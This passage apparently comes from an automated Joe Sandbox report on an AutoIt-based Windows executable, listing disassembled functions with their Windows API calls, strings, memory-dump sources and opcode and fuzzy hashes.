                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                        • Opcode ID: b8177b7504c1bc7808b267b87ffa2fdfdca17c5ade36ab8a29ad1f84c136c69c
                                                                                                                        • Instruction ID: aeceea1e5552cd102f269c8e57dd3fc0925881b0d8dbea62e27337d15614394d
                                                                                                                        • Opcode Fuzzy Hash: b8177b7504c1bc7808b267b87ffa2fdfdca17c5ade36ab8a29ad1f84c136c69c
                                                                                                                        • Instruction Fuzzy Hash: F111EB6164015D79D710B7A1DC46DFF7BBCEFD2B00F04581A7811B20D0DEA04E08D5B1
                                                                                                                        Function 00E98097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 00E9809C
                                                                                                                          • Part of subcall function 00E6E3A5: timeGetTime.WINMM(?,7694B400,00EC6163), ref: 00E6E3A9
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00E980C8
                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00E980EC
                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00E9810E
                                                                                                                        • SetActiveWindow.USER32 ref: 00E9812D
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9813B
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9815A
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00E98165
                                                                                                                        • IsWindow.USER32 ref: 00E98171
                                                                                                                        • EndDialog.USER32(00000000), ref: 00E98182
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: BUTTON
                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                        • Opcode ID: f960e5064acdb009071779e55e6e2b5ebac62d60560d5344c2ea2a6546270103
                                                                                                                        • Instruction ID: 162f628d91a732cfd796afce7f0b336206419d4f2a6284aa4476a0deaaadf22f
                                                                                                                        • Opcode Fuzzy Hash: f960e5064acdb009071779e55e6e2b5ebac62d60560d5344c2ea2a6546270103
                                                                                                                        • Instruction Fuzzy Hash: 9721C370205208FFEB229B32FD89AA63B6AF75638CF055126F411B2271CF768D09A750
                                                                                                                        Function 00E932B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EC3C64,00000010,00000000,Bad directive syntax error,00EEDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00E932D1
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC3C64,00000010), ref: 00E932D8
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • _wprintf.LIBCMT ref: 00E93309
                                                                                                                        • __swprintf.LIBCMT ref: 00E9332B
                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E93395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                        • Opcode ID: 1438062df67f85f1e9d2114f0d01032627e88d59c508a1f6ccc47d27e6941b3e
                                                                                                                        • Instruction ID: 9169aeef842f4a3c176cda08e209efa8735db1537585bef95c42340076f14d81
                                                                                                                        • Opcode Fuzzy Hash: 1438062df67f85f1e9d2114f0d01032627e88d59c508a1f6ccc47d27e6941b3e
                                                                                                                        • Instruction Fuzzy Hash: 44214F3184421AFBDF12EFE0CC4AEEE7779FF14701F009456B915B10A2EA71AA58EB51
                                                                                                                        Function 00E978EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: 0.0.0.0
                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                        • Opcode ID: ba1c1138ef3613081258a845ec34bdcf6c03c8a5a641073fc144d2049a1a804c
                                                                                                                        • Instruction ID: e79819bea95efc026d92713427fc588199c9b9615bdeddfc7c6e6e9820ee2d30
                                                                                                                        • Opcode Fuzzy Hash: ba1c1138ef3613081258a845ec34bdcf6c03c8a5a641073fc144d2049a1a804c
                                                                                                                        • Instruction Fuzzy Hash: FD11E731908115AFDF24A774AC45EDE77ACDF81724F0150A6F589B6091EF70DA898660
                                                                                                                        Function 00E9C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9C6A0: __time64.LIBCMT ref: 00E9C6AA
                                                                                                                          • Part of subcall function 00E541A7: _fseek.LIBCMT ref: 00E541BF
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E9C96F
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscpy.LIBCMT ref: 00E9C982
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C995
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E9C9BA
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C9D0
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C9E3
                                                                                                                          • Part of subcall function 00E9C6E4: _memmove.LIBCMT ref: 00E9C71D
                                                                                                                          • Part of subcall function 00E9C6E4: _memmove.LIBCMT ref: 00E9C72C
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9C92A
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E9CB8D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9CC24
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9CC3A
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9CC4B
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9CC5D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 152968663-0
                                                                                                                        • Opcode ID: 8757b93ce577116a8d47fcb0793c29c49e6d3679db4af9f56166198a359d866a
                                                                                                                        • Instruction ID: 406bb0866b911e4308fc852e1575935156a8316429f87cc6642e5784c1306741
                                                                                                                        • Opcode Fuzzy Hash: 8757b93ce577116a8d47fcb0793c29c49e6d3679db4af9f56166198a359d866a
                                                                                                                        • Instruction Fuzzy Hash: 62C12BB1900129AECF10EFA5CC81ADEBBB9EF49314F1050AAB609F6151D7709A84CF65
                                                                                                                        Function 00EA08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3566271842-0
                                                                                                                        • Opcode ID: 06c0fd356a70a06d7b5c74608861ccbcb35428cf8fdf8a84c5a56afa05a0997b
                                                                                                                        • Instruction ID: 4b028142f17ab15a56cc0cc669088c8d7ab62675973fe46129653f0a017a581c
                                                                                                                        • Opcode Fuzzy Hash: 06c0fd356a70a06d7b5c74608861ccbcb35428cf8fdf8a84c5a56afa05a0997b
                                                                                                                        • Instruction Fuzzy Hash: B2712B75A00219AFDB10DFA4C984ADEB7F8EF49314F049496E919FB252D730AE45CF90
                                                                                                                        Function 00E9388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E93908
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E93973
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E93993
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00E939AA
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E939D9
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00E939EA
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E93A16
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00E93A24
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E93A4D
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00E93A5B
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E93A84
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00E93A92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: b1fabd18356f6b4884eada49436abca9a571979cf8fa2d1d42818acaaf95b89b
                                                                                                                        • Instruction ID: eeab9d52537d80a1660d454bf666a29ee921f12e8e2ae429235ec0012ac24a8d
                                                                                                                        • Opcode Fuzzy Hash: b1fabd18356f6b4884eada49436abca9a571979cf8fa2d1d42818acaaf95b89b
                                                                                                                        • Instruction Fuzzy Hash: DF51A860A047846DFF35EBB488117EAAFF49F02748F08559AD5C2761C2DA949B8CC761
                                                                                                                        Function 00E8FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00E8FB19
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FB2B
                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E8FB89
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00E8FB94
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FBA6
                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E8FBFC
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8FC0A
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FC1B
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E8FC5E
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E8FC6C
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E8FC89
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8FC96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3096461208-0
                                                                                                                        • Opcode ID: 3386785cef622f57e0ee2c43984847a1ef7207f7d5fd44cf134b9b800129f334
                                                                                                                        • Instruction ID: 82a38f1b6a493a25dbe1aa1577baa5e41b12776daebfe5bf62dd5edd92440602
                                                                                                                        • Opcode Fuzzy Hash: 3386785cef622f57e0ee2c43984847a1ef7207f7d5fd44cf134b9b800129f334
                                                                                                                        • Instruction Fuzzy Hash: D3514371B00205AFDB08DF69DD95AAEBBB9EB88315F14813DF919E7290D770DE048B10
                                                                                                                        Function 00E6B86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E549CA: InvalidateRect.USER32(?,00000000,00000001), ref: 00E54A23
                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E6B85B), ref: 00E6B926
                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00E6B9BD
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00ECE775
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7A6
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7BD
                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7D9
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00ECE7EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 641708696-0
                                                                                                                        • Opcode ID: 2f6add916173112e119d3670cbb821f6ae3985c6b26fde60275e3772a393453a
                                                                                                                        • Instruction ID: 1a6772ba6e1ef7e42caa9a54edb2072ff16f90f381e560095c92c3892c50e6ae
                                                                                                                        • Opcode Fuzzy Hash: 2f6add916173112e119d3670cbb821f6ae3985c6b26fde60275e3772a393453a
                                                                                                                        • Instruction Fuzzy Hash: D261EC31140705CFDB259F29E988BA5B7F5FF8036AF14A51EE282A7660C731A8C6DB40
                                                                                                                        Function 00E6B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B155: GetWindowLongW.USER32(?,000000EB), ref: 00E6B166
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00E6B067
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: 3b0a970b41c260b0f3ab33dbda9fba83fced029f83df51d090820830676aaca9
                                                                                                                        • Instruction ID: db096d0687576330f99d77d7ab6811bcf5f8c94470d0ee29e300c7f364da9fa0
                                                                                                                        • Opcode Fuzzy Hash: 3b0a970b41c260b0f3ab33dbda9fba83fced029f83df51d090820830676aaca9
                                                                                                                        • Instruction Fuzzy Hash: EA41D031185500EFDB205F28EC98BBA3B65EB06774F145265FD65EA1E6C7328C82DB21
                                                                                                                        Function 00E97334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 136442275-0
                                                                                                                        • Opcode ID: 5637a86697bcb739ca9cf099e223347e769e46577a9fc699e1ee7dd8c4f27331
                                                                                                                        • Instruction ID: b75c51239bbca0747ba925bbed1e530df445aa0797e7c092169d2990ce2bf37e
                                                                                                                        • Opcode Fuzzy Hash: 5637a86697bcb739ca9cf099e223347e769e46577a9fc699e1ee7dd8c4f27331
                                                                                                                        • Instruction Fuzzy Hash: D141007280422CAADF21EB54CC41EDE73FCAB48310F0091E6F619B2041EA719BD9CF60
                                                                                                                        Function 00E9DFFE Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(00EEDBF0,00EEDBF0,00EEDBF0), ref: 00E9E062
                                                                                                                        • GetDriveTypeW.KERNEL32(?,00F03AE4,00000061), ref: 00E9E12C
                                                                                                                        • _wcscpy.LIBCMT ref: 00E9E156
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2820617543-1000479233
                                                                                                                        • Opcode ID: fb47d7469eb20c7fb925e169e2d4a6098484036a638287edca841be6691a01eb
                                                                                                                        • Instruction ID: 0bd1790d1fa37959ae8d8db9f804bc584a1351df123406b0ae678cb5e72727ad
                                                                                                                        • Opcode Fuzzy Hash: fb47d7469eb20c7fb925e169e2d4a6098484036a638287edca841be6691a01eb
                                                                                                                        • Instruction Fuzzy Hash: B851C335144300AFCB14EF14D891AAAB7E5EF84354F14982DFAA6772A2DB71DE09CB42
                                                                                                                        Function 00E584A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00E584E5
                                                                                                                        • __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E72177: _xtow@16.LIBCMT ref: 00E72198
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                        • Opcode ID: 3abb9441cf7a20519e70348656e503400267b8b84d62a1af12689b15d22ca4e9
                                                                                                                        • Instruction ID: 4295844710967be596c0b17b7674953eab84161cee73e1eff0d8bb25fd47bbfa
                                                                                                                        • Opcode Fuzzy Hash: 3abb9441cf7a20519e70348656e503400267b8b84d62a1af12689b15d22ca4e9
                                                                                                                        • Instruction Fuzzy Hash: D5414A32600605DBDB24DB38D941F7A73E5BF44301F20585EE95AF7281EE32EA46CB11
                                                                                                                        Function 00EB9FC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EBA067
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00EBA06E
                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EBA081
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBA089
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBA094
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00EBA09D
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EBA0A7
